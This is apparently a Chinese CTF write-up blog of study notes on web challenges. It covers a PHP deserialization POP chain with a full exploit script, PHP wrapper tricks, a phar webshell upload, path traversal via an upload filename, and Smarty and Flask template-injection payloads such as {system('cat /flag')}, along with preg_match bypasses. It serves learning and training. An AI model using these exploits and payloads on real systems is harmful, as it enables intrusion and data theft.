<h3 id="5-popchains"><a href="#5-popchains" class="headerlink" title="5.popchains"></a>5.popchains</h3><p>Happy New Year~ MAKE A WISH<br><code>&lt;?php</code> </p>
<p>  <code>echo &#39;Happy New Year~ MAKE A WISH&lt;br&gt;&#39;; if(isset($_GET[&#39;wish&#39;]))&#123;   @unserialize($_GET[&#39;wish&#39;]);</code></p>
<p>  <code>&#125;</code> </p>
<p>  <code>else&#123;  </code></p>
<p>  <code>$a=new Road_is_Long;  </code> </p>
<p>  <code>highlight_file(__FILE__); &#125; /***************************pop your 2022*****************************/ </code></p>
<p>  <code>class Road_is_Long&#123; </code></p>
<p>  <code> public $page; </code></p>
<p>  <code>public $string; </code> </p>
<p>  <code>public function __construct($file=&#39;index.php&#39;)&#123;     $this-&gt;page = $file; </code> </p>
<p>  <code>&#125;</code> </p>
<p>  <code> public function __toString()&#123;  </code>  </p>
<p>  <code> return $this-&gt;string-&gt;page;</code>  </p>
<p>  <code> &#125; </code>  </p>
<p>  <code>public function __wakeup()&#123;     if(preg_match(&quot;/file|ftp|http|https|gopher|dict|\.\./i&quot;, $this-&gt;page)) &#123;    </code> </p>
<p>  <code> echo &quot;You can Not Enter 2022&quot;;   </code>  </p>
<p>  <code>  $this-&gt;page = &quot;index.php&quot;;   </code>   </p>
<p>  <code>                     &#125; </code> </p>
<p>  <code>   &#125;</code> </p>
<p>  <code>&#125; </code></p>
<p>  <code>class Try_Work_Hard&#123;  </code></p>
<p>  <code>protected $var;  </code> </p>
<p>  <code>public function append($value)&#123; </code></p>
<p>  <code>   include($value);  </code>    </p>
<p>  <code>&#125; </code></p>
<p>  <code> public function __invoke()&#123;</code>  </p>
<p>  <code>   $this-&gt;append($this-&gt;var);  </code>    </p>
<p>  <code>&#125;</code></p>
<p>  <code> &#125;</code> </p>
<p>  <code> class Make_a_Change&#123;</code> </p>
<p>  <code>   public $effort;</code>   </p>
<p>  <code>  public function __construct()&#123;    </code>   </p>
<p>  <code>$this-&gt;effort = array();</code></p>
<p>  <code>  &#125;</code>   </p>
<p>  <code> public function __get($key)&#123; </code>  </p>
<p>  <code>  $function = $this-&gt;effort;   </code>   </p>
<p>  <code> return $function();</code> </p>
<p>  <code>   &#125;</code>   </p>
<p>  <code> &#125;</code> </p>
<p>  ` /<strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>Try to See flag.php</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong>*******/  </p>
<p>这一题相对上一题来说的思路会更显然一些：</p>
<p>pop链子：</p>
<p>unserialize()-&gt;__wakeup()-&gt;Road_is_Long:: __ <strong>toString()</strong>-&gt;Make_a_Change::__get()-&gt;Try_Work_Hard::__invoke()-&gt;append()-&gt;include()</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">__get()    用于从不可访问的属性读取数据</span><br><span class="line">#难以访问包括：（1）私有属性，（2）没有初始化的属性</span><br></pre></td></tr></table></figure>

<p>从头看，首先serialize会触发__wakeup()，</p>
<p>wakeup()方法通过preg_match()将$this-&gt;page做字符串比较，如果$this-&gt;page是Road_is_Long类，就调用了toString()方法；</p>
<p>又因为如果$string的page属性难以访问，则会调用_get，如果$string是Test类，则不存在page属性.</p>
<p>exp：</p>
<p>编写时保留属性进行推导，根据情况保留一些必要方法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Try_Work_Hard</span><br><span class="line">&#123;</span><br><span class="line">    public $var = &quot;php://filter/read=convert.base64-encode/resource=/flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Make_a_Change</span><br><span class="line">&#123;</span><br><span class="line">    public $effort;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Road_is_Long</span><br><span class="line">&#123;</span><br><span class="line">    public $page;</span><br><span class="line">    public $string;</span><br><span class="line"></span><br><span class="line">    public function __construct($file)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;page = $file;//page的来源（所以需要保留）</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new Road_is_Long(aaa);</span><br><span class="line">//实例化Road_is_Long 传入aaa(任意）只是为了满足__construct</span><br><span class="line">$a-&gt;string = new Make_a_Change();</span><br><span class="line">//实例化成一个没有page属性的类</span><br><span class="line">$a-&gt;string-&gt;effort = new Try_Work_Hard();</span><br><span class="line">//实例化p（这里string已经是一个类了）</span><br><span class="line">$b = new Road_is_Long($a);</span><br><span class="line">//因为我们要传入$file=一个类 这样$this-&gt;page=$file之后 在正则过滤时 就是一个类被当作字符串对待 触发__toString</span><br><span class="line">echo urlencode(serialize($b));</span><br><span class="line">//输出</span><br></pre></td></tr></table></figure>

<h3 id="6-bindundun"><a href="#6-bindundun" class="headerlink" title="6.bindundun~"></a>6.bindundun~</h3><p>这题是属于文件上传的考点，复习一下一些忘记的点：</p>
<h5 id="伪协议的一类：实现php源码读取等权利"><a href="#伪协议的一类：实现php源码读取等权利" class="headerlink" title="伪协议的一类：实现php源码读取等权利"></a>伪协议的一类：实现php源码读取等权利</h5><p>1.php:// 访问输入输出流，有两个常用的子协议</p>
<h6 id="1-php-filter-设计用来过滤筛选文件"><a href="#1-php-filter-设计用来过滤筛选文件" class="headerlink" title="(1)php://filter 设计用来过滤筛选文件"></a>(1)php://filter 设计用来过滤筛选文件</h6><h6 id="2-file"><a href="#2-file" class="headerlink" title="(2)file://"></a>(2)file://</h6><p>与php:filter类似，访问本地文件，但是只能传入绝对路径</p>
<h6 id="3-php-input"><a href="#3-php-input" class="headerlink" title="(3)php://input"></a>(3)php://input</h6><p>这个协议的利用方法是 将要执行的语法php代码写在post中提交，不用键与值的形式，只写代码即可。</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-03%20205103-16489903268701.png" alt="屏幕截图 2022-04-03 205103"></p>
<h6 id="4-phar-可以查找指定压缩包内的文件"><a href="#4-phar-可以查找指定压缩包内的文件" class="headerlink" title="(4)phar:// 可以查找指定压缩包内的文件"></a>(4)phar:// 可以查找指定压缩包内的文件</h6><p>1.传入绝对路径,拼接 ?file=phar://xxxxxxxxxxxxxxx/xx</p>
<p>无论file名是什么，都在file名后加一个 .php 后缀，所以我们最后后边没有加后缀<img src="/images/1-16489906914102.png" alt="1"></p>
<p>2，传入相对路径，即同级目录下的文件</p>
<p><img src="/images/2-16489906946313.png" alt="2"></p>
<h6 id="（5）zip"><a href="#（5）zip" class="headerlink" title="（5）zip://"></a>（5）zip://</h6><p>用法与phar类似，不过有两点要注意</p>
<p>1，只能传入绝对路径。</p>
<p>2，要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23</p>
<p><img src="/images/3-16489908700124.png" alt="3"></p>
<h6 id="（6）data："><a href="#（6）data：" class="headerlink" title="（6）data："></a>（6）data：</h6><p> 与input 类似，都是用户可以控制传入的php代码</p>
<p>1，直接写入代码</p>
<p>data: text/plain,<?php 执行内容 ?></p>
<p>2，使用base64编码</p>
<p>data:text/plain;(注意是分号不是逗号，与前面不同)base64,编码后的php代码，注意base64编码后的加号和等号要手动的url编码，否则无法识别。</p>
<h6 id="（7）http"><a href="#（7）http" class="headerlink" title="（7）http://"></a>（7）http://</h6><p>可以引入外部链接：<img src="/images/6-16489913018955.png" alt="6"></p>
<h5 id="关于菜刀的连接"><a href="#关于菜刀的连接" class="headerlink" title="关于菜刀的连接"></a>关于菜刀的连接</h5><p>这里补充一个我一直对于一句话木马困惑的一个点，什么时候可以运行使得可以连接：</p>
<p>就是文件必须是以php或是asp的方式被解析才可以。所以我们上传（如图片马）其他类型的文件必须让它被以php文件类型执行，所以用到了：include()包含漏洞</p>
<h5 id="include（）函数读取源码原理："><a href="#include（）函数读取源码原理：" class="headerlink" title="include（）函数读取源码原理："></a>include（）函数读取源码原理：</h5><p>非php语法文件include失败，直接输出源码内容。php文件include()会成功，直接运行，如果要读取php文件的源码，可以先base64编码，在传入include函数，这样不会被认为是PHP文件，不会执行，输出文件的base64编码。其他编码方式（如rot13会导致乱码）</p>
<h5 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h5><p>在做题时会遇到过滤的类型，我们只能靠猜，然后不断去换。这道题目我们猜测目录是在f12看源码后知道的，然后参数是返回index.php时直接给出来了。这里一开始用图片马方式上传但是因为用filer协议访问后回显被过滤，所以我们重新找到了新的注入点和注入方式。</p>
<h5 id="制作压缩包里木马的方式："><a href="#制作压缩包里木马的方式：" class="headerlink" title="制作压缩包里木马的方式："></a>制作压缩包里木马的方式：<img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20103329.png" alt="屏幕截图 2022-04-04 103329"></h5><p>padload:?bingdundun=phar://xxxxxx.zip/xxx</p>
<p>在压缩包里的文件是不加后缀名的，因为通过一些猜测可以看出有自动补全的机制。况且做多了题目也会发现通常都是这样。</p>
<p>然后发送解析后用蚁剑连上去就好了。然后还有一个点就是要规范累积工具模板，以后直接用。</p>
<h3 id="7-babyupload"><a href="#7-babyupload" class="headerlink" title="7.babyupload"></a>7.babyupload</h3><p>这题与python联系在一起，之前看了一些python网课，但是进程不快，这周得抓紧完结了，不然太耽误进程还容易忘记。</p>
<p>总结：</p>
<p>扫平台的工具和bp和源码一定要先用，避免绕弯子，找到源码下载后发现关键代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">def upload():</span><br><span class="line">    if &#x27;file&#x27; not in request.files:</span><br><span class="line">        return redirect(&#x27;/&#x27;)</span><br><span class="line">    file = request.files[&#x27;file&#x27;]</span><br><span class="line">    if &quot;.&quot; in file.filename:</span><br><span class="line">        return &quot;Bad filename!&quot;, 403</span><br><span class="line">  这里过滤了.，所以没办法传入正常文件格式      </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">with open(os.path.join(&quot;uploads/&quot;, res[0]), &quot;r&quot;) as f:</span><br><span class="line">    return f.read()</span><br></pre></td></tr></table></figure>

<p>解释一下这句话：</p>
<p>1.<strong>os.path.join()函数</strong>：连接两个或更多的路径名组件</p>
<p>​            1.如果各组件名首字母不包含’/’，则函数会自动加上</p>
<p>　　　2.如果有一个组件是一个绝对路径，则在它之前的所有组件均会被舍弃</p>
<p>　　　3.如果最后一个组件为空，则生成的路径以一个’/’分隔符结尾</p>
<p>import os</p>
<p>Path1 = ‘home’<br>Path2 = ‘develop’<br>Path3 = ‘code’</p>
<p>Path10 = Path1 + Path2 + Path3<br>Path20 = os.path.join(Path1,Path2,Path3)<br>print (‘Path10 = ‘,Path10)<br>print (‘Path20 = ‘,Path20)</p>
<p><strong>输出</strong> </p>
<p>Path10 = homedevelopcode<br>Path20 = home\develop\code</p>
<p> <strong>2.res[0]</strong></p>
<p>回到前文 res = cur.fetchone()</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">def file(id):</span><br><span class="line">    conn = db()</span><br><span class="line">    cur = conn.cursor()</span><br><span class="line">    cur.execute(&quot;select path from files where id=?&quot;, (id,))</span><br><span class="line">    res = cur.fetchone()</span><br><span class="line">    if res is None:</span><br><span class="line">        return &quot;File not found&quot;, 404</span><br></pre></td></tr></table></figure>

<p>这篇文章可以看看：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/z-x-y/p/9055509.html">关于python中的查询数据库内容中用到的fetchone()函数和fetchall()函数(转)还有fetchmany()</a></p>
<p>fetchone()用法：</p>
<p>cur.execute(“select host,user,password from user where user=’%s’” %acc)<br>jilu = cur.fetchone()  ##此时 通过 jilu[0],jilu[1],jilu[2]可以依次访问host,user,password，所以传入res[0]=flag使之访问拼接路径查询flag</p>
<p><strong>3.with open（） as 读写文件</strong></p>
<p><strong>Python引入了<code>with</code>语句来自动帮我们调用<code>close()</code>方法：</strong>with open（） as 读写文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;/path/to/file&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(f.read())</span><br></pre></td></tr></table></figure>

<p>所以猜测可以读取flag</p>
<p>看了wp才懂得这里有一个漏洞：</p>
<p>如果碰到<code>/</code>开头的字符串，会出现一个bug，就可以直接访问<code>/flag</code>了。</p>
<p><strong>利用:</strong></p>
<p>打开burp，随意上传一个文件，抓到包之后在proxy把文件名改成<code>/flag</code>，直接forward两次，回到浏览器就会看到flag。</p>
<h3 id="8-is-secret"><a href="#8-is-secret" class="headerlink" title="8.is secret"></a>8.is secret</h3><p>扫目录：dirsearch</p>
<p>命令行打开dirsearch窗口 格式为： dirsearch.py -u 网址 -e *</p>
<p>而Powershell使用格式为 ： python dirsearch.py -u 网址 -e *(加个python)</p>
<p>一个集成的跨平台，有比cmd更多的功能。</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20112518.png" alt="屏幕截图 2022-04-04 112518"></p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20112747.png" alt="屏幕截图 2022-04-04 112747"></p>
<p>看到这个就会有一个想法就是说尝试输入secret的值：所以传入；</p>
<p><a target="_blank" rel="noopener" href="http://1.14.71.254:28278/secret?secret=1%E5%8F%91%E9%80%81%E7%9A%84%E5%86%85%E5%AE%B9%E5%9B%9E%E6%98%BE%E5%8A%A0%E5%AF%86%E4%BA%86%EF%BC%8C%E4%BD%86%E6%98%AF%E4%B8%8D%E7%9F%A5%E9%81%93%E6%80%8E%E4%B9%88%E5%8A%A0%E5%AF%86%E4%BA%86%E3%80%82">http://1.14.71.254:28278/secret?secret=1发送的内容回显加密了，但是不知道怎么加密了。</a></p>
<p>修改参数的值进行盲测,发现如果传入的字符串达到一定长度会报错：</p>
<p>wp里说明了这属于模板注入的题型，就是这个flask关键词。其实我之前接触过，但是不全面，所以接下来分题型要开始注意下。</p>
<p>先说说这题的做法吧：</p>
<p>在网页端进入报错页面 /secret?secret=flag.txt，发现是flask的报错，显示了部分源码。可以看到是flask，python版本是2.7</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20114359.png" alt="屏幕截图 2022-04-04 114359"></p>
<p>然后我们查找ctrl+f搜secret跳到有关页面：</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20114244.png" alt="屏幕截图 2022-04-04 114244"></p>
<p>加密算法使用的是RC4，密钥泄漏了。将所发送内容解密之后会被渲染，因此考虑到可能存在模版注入。（了解加密方式，在此基础上编写混合得出模板注入的脚本）</p>
<p>找了一个RC4加密脚本,再次基础上输入密钥并尝试文件读取</p>
<p><strong>import</strong> base64<br><strong>from</strong> urllib.parse <strong>import</strong> quote<br><strong>def</strong> <strong>rc4_main</strong>(key = “init_key”, message = “init_message”):<br>    # print(“RC4加密主函数”)<br>    s_box = rc4_init_sbox(key)<br>    crypt = str(rc4_excrypt(message, s_box))<br>    <strong>return</strong>  crypt<br><strong>def</strong> <strong>rc4_init_sbox</strong>(key):<br>    s_box = list(range(256))  # 我这里没管秘钥小于256的情况，小于256不断重复填充即可<br>    # print(“原来的 s 盒：%s” % s_box)<br>    j = 0<br>    <strong>for</strong> i <strong>in</strong> range(256):<br>        j = (j + s_box[i] + ord(key[i % len(key)])) % 256<br>        s_box[i], s_box[j] = s_box[j], s_box[i]<br>    # print(“混乱后的 s 盒：%s”% s_box)<br>    <strong>return</strong> s_box<br><strong>def</strong> <strong>rc4_excrypt</strong>(plain, box):<br>    # print(“调用加密程序成功。”)<br>    res = []<br>    i = j = 0<br>    <strong>for</strong> s <strong>in</strong> plain:<br>        i = (i + 1) % 256<br>        j = (j + box[i]) % 256<br>        box[i], box[j] = box[j], box[i]<br>        t = (box[i] + box[j]) % 256<br>        k = box[t]<br>        res.append(chr(ord(s) ^ k))<br>    # print(“res用于加密字符串，加密后是：%res” %res)<br>    cipher = “”.join(res)<br>    print(“加密后的字符串是：%s” %quote(cipher))<br>    #print(“加密后的输出(经过编码):”)<br>    #print(str(base64.b64encode(cipher.encode(‘utf-8’)), ‘utf-8’))<br>    <img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-05%20185130.png" alt="屏幕截图 2022-04-05 185130"></p>
<p>这个确实还不是很懂，所以等到python学完看题时再来学着码。</p>
<h3 id="9-midlevel"><a href="#9-midlevel" class="headerlink" title="9.midlevel"></a>9.midlevel</h3><p>这题赛后居然在网上找到一篇超级像的，感觉当时就应该看看，绝对做得出来：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45521281/article/details/107556915">(54条消息) PHP的模板注入（Smarty模板）_WHOAMIAnony的博客-CSDN博客_smarty模板注入</a></p>
<p>这里的提示是bulid with smarty,所以猜测是smarty SSTI，然后我们通过页面右上角回显current IP得知是用ip注入，应该就是和X-Forwarded-For有关。在burp里面构造在headers里面添加修改</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20115824.png" alt="屏幕截图 2022-04-04 115824"></p>
<p>令X-Forwarded-For：{1+2}</p>
<p>然后：X-Forwarded-For:{system(‘cat /flag’)}</p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20120351.png" alt="屏幕截图 2022-04-04 120351"></p>
<p><img src="/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-04%20120752.png" alt="屏幕截图 2022-04-04 120752"></p>
<p>wp里面是带我们了解了一下</p>
<h5 id="smarty"><a href="#smarty" class="headerlink" title="smarty"></a>smarty</h5><p><a target="_blank" rel="noopener" href="https://www.freesion.com/article/41281163044/">PHP的模板注入（Smarty模板） - 灰信网（软件开发博客聚合） (freesion.com)</a></p>
<p>1.一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号</p>
<p>2.<em>Smarty已经废弃{php}标签，强烈建议不要使用。在Smarty 3.1，{php}仅在SmartyBC中可用</em></p>
<p>Smarty支持使用<code>&#123;php&#125;phpinfo();&#123;/php&#125;</code>这样的标签来执行被包裹其中的php指令，最常规的思路自然是先测试该标签。</p>
<p>3.<strong>Smarty的<code>&#123;if&#125;</code>条件</strong></p>
<p>判断和PHP的if非常相似，只是增加了一些特性。每个{if}必须有一个配对的{/if}，也可以使用{else} 和 {elseif}，全部的PHP条件表达式和函数都可以在if内使用，如*||*, or, &amp;&amp;, and, is_array(), 等等，如：<code>&#123;if is_array($array)&#125;&#123;/if&#125;</code></p>
<p>X-Forwarded-For:{if readfile(‘/flag’)}{/if}</p>
<p>4.可能的形成原因：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$smarty-&gt;display(&quot;string:&quot;.$ip)     </span><br><span class="line">    // display函数把标签替换成对象的php变量；显示模板</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>未经过任何过滤。<br>采用了Smarty模板引擎，导致了ssti。</p>
<h5 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h5><p>Smarty是基于PHP开发的，对于Smarty的SSTI的利用手段与常见的python的flask的SSTI有很大区别</p>
<h3 id="10-middlerce"><a href="#10-middlerce" class="headerlink" title="10.middlerce"></a>10.middlerce</h3><p>这种题目类型在百度的博客文里都被写烂了，可是我之前连见都没见过，惭愧题目还是做太少：</p>
<p>这是一个的知识点：</p>
<h4 id="正则回溯绕过-PCRE绕过"><a href="#正则回溯绕过-PCRE绕过" class="headerlink" title="正则回溯绕过(PCRE绕过)"></a>正则回溯绕过(PCRE绕过)</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;check.php&quot;;</span><br><span class="line">if (isset($_REQUEST[&#x27;letter&#x27;]))&#123;</span><br><span class="line">$txw4ever = $_REQUEST[&#x27;letter&#x27;];</span><br><span class="line">if (preg_match(&#x27;/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&amp;|!|\&lt;|\&gt;|\&#123;|\x09|\x0a|\[).*$/m&#x27;,$txw4ever))&#123;   </span><br><span class="line">正则指的是匹配以任意字符开头，中间出现([\w]或^或*或(或~或`或?或/或||或&amp;或!或&lt;或&gt;或&#123;|\x09|\x0a|\[)</span><br><span class="line">[]指的是一个字符，</span><br><span class="line">.* 属于非贪婪模式，当部分正则匹配，但是不符合完整正则时，正则引擎会逐个字符减少，然后回溯匹配，这个也算是这种题目的特征，多接触就懂了。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">die(&quot;再加把油喔&quot;);  &#125;  </span><br><span class="line">else&#123;</span><br><span class="line">$command = json_decode($txw4ever,true)[&#x27;cmd&#x27;]; </span><br><span class="line">true返回值是数组,否则返回值为object</span><br><span class="line"> public &#x27;a&#x27; =&gt; int 1（对象）</span><br><span class="line">&#x27;a&#x27; =&gt; int 1（数组） </span><br><span class="line"></span><br><span class="line">checkdata($command);   </span><br><span class="line">@eval($command); </span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>这里if语句绕过可以用preg_match或是主要是通过绕过正则</p>
<h5 id="1-关于preg-match-的绕过问题："><a href="#1-关于preg-match-的绕过问题：" class="headerlink" title="1.关于preg_match()的绕过问题："></a>1.关于preg_match()的绕过问题：</h5><p>（1）数组绕过，即传入的参数为数组（新生赛有做过，但是不适用于一些限制只能用字符串的情况，json_decode()不满足），这里就是传入键值对</p>
<p><img src="../images/4.5.png" alt="4.5"></p>
<p>但是如果禁止传递数组的时候怎么绕过？这就涉及到：</p>
<p>（2）（出现正则匹配的情况）利用<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html">PCRE回溯次数限制绕过</a>：</p>
<p>让回溯次数超过最大限制就可以使preg_match()函数返回false,从而绕过限制，中文的回溯次数在100万次就会崩溃，这个回溯保护使PHP为了防止关于正则表达式的DDOS</p>
<p>（3）换行符绕过：.不会匹配换行符，用</p>
<p><img src="../images/1-16491250253041.png" alt="1"></p>
<p>换行符（\n或%0a）</p>
<p><code>.</code>不会匹配换行符，如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">&#x27;/^.*(flag).*$/&#x27;</span>, <span class="variable">$json</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;Hacking attempt detected&lt;br/&gt;&lt;br/&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="number">123</span></span><br></pre></td></tr></table></figure>

<p>要求不能再中间位置匹配到flag，我们只需要：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$json</span>=<span class="string">&quot;\nflag&quot;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>而在非多行模式下，<code>$</code>似乎会忽略在句尾的<code>%0a</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">&#x27;/^flag$/&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]) &amp;&amp; <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>] !== <span class="string">&#x27;flag&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>只需要传入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a=flag%<span class="number">0</span>a</span><br></pre></td></tr></table></figure>

<p>但是这里也不行：正则有个<code>m</code>，<code>%0a</code>大法就用不上了</p>
<h5 id="关于正则修饰符"><a href="#关于正则修饰符" class="headerlink" title="关于正则修饰符"></a>关于正则修饰符</h5><p>（1**）m 影响对行首、行尾的解释，也就是影响 ^、$**。</p>
<p>m修饰符规定正则表达式可以执行多行匹配,在默认状态下，一个字符串无论是否换行只有一个开始^和结尾$，如果采用多行匹配，那么每一个行都有一个^和结尾$。</p>
<p>题目如果没有用m可以用%0a截断。默认单行情况。但是m字符串加入后就变成了多行匹配，无法绕过。</p>
<p>（2） i/g是比较简单的了。 i是指忽略大小写， g是指的全局</p>
<p>用法：js里的用法：</p>
<script type="text/javascript">
str = "tankZHang (231144)"+
 "tank ying (155445)";
res = str.match(/zhang/);    
alert(res);                  //显示为null
res = str.match(/zhang/i);   //加了/i。可以换成/g
alert(res);                  //显示为ZHang
</script>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">（3）/i不区分大小写</span><br><span class="line"></span><br><span class="line">（4）/s匹配任何不可见字符，包括空格、制表符、换页符等等，等价于[fnrtv]</span><br><span class="line"></span><br><span class="line">（5）/D如果使用$限制结尾字符,则不允许结尾有换行;</span><br></pre></td></tr></table></figure>

<h5 id="2-关于正则表达式的绕过"><a href="#2-关于正则表达式的绕过" class="headerlink" title="2.关于正则表达式的绕过"></a>2.关于<a target="_blank" rel="noopener" href="https://www.tqwba.com/x_d/jishu/283681.html">正则表达式的绕过</a></h5><p>ps：今天学会了出题目的简单过程，在本地调试了一下，真开心</p>
<p><img src="../images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202022-04-05%20110314.png" alt="屏幕截图 2022-04-05 110314"></p>
<ol>
<li>换行符绕过(%0a)</li>
<li>数组绕过<br>preg_match只能处理字符串，当传入的subject是数组时会返回false</li>
<li>%5c绕过</li>
<li>preg_match(“/^$/e”) (注：php版本需要小于5.5.0)<br>preg_replace 使用了 /e 模式，导致可以代码执行</li>
<li>PHP利用PCRE回溯次数限制绕过某些安全限制</li>
</ol>
<h4 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h4><hr>
 <?php
 include "check.php";
 if (isset($_REQUEST['letter'])){
 $txw4ever = $_REQUEST['letter'];
 if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){   
 正则指的是匹配以任意字符开头，中间出现([\w]或^或*或(或~或`或?或/或||或&或!或<或>或{|\x09|\x0a|\[)
 []指的是一个字符，
 .* 属于非贪婪模式，当部分正则匹配，但是不符合完整正则时，正则引擎会逐个字符减少，然后回溯匹配，这个也算是这种题目的特征，多接触就懂了。

 die("再加把油喔");  }  
 else{
 $command = json_decode($txw4ever,true)['cmd']; 
 true返回值是数组,否则返回值为object
  public 'a' => int 1（对象）
 'a' => int 1（数组） 

 checkdata($command);   
 @eval($command); 
   }
 }
 else{
 highlight_file(__FILE__);
 }
 ?><hr>
<p>这题就是说首先要在</p>
